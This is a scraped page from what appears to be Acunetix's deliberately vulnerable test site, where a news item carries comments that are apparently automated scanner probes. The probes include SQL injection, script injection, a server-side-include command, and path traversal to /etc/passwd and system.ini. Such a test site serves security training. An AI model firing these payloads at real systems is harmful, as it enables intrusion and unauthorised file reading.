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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKj2qK0CgKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9rxwFhLxxDYwM0HAXEgfiaKoEHeg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a>
          						<DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:29 PM</DIV><DIV class="CommentText">zApPX3sS</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:59 PM</DIV><DIV class="CommentText"> UNION ALL select NULL -- </DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:56 PM</DIV><DIV class="CommentText">"</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">"</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">;</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">;</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:08:00 PM</DIV><DIV class="CommentText">" UNION ALL select NULL -- </DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:08:00 PM</DIV><DIV class="CommentText">) UNION ALL select NULL -- </DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:41 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:42 PM</DIV><DIV class="CommentText"></div><script>alert(1);</script><div></DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-after.gif"></td>
          	</tr>
          	<tr>
          		<td><IMG src="images/comment-before.gif"></td>
          	</tr>
          	<tr>
          		<td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td>
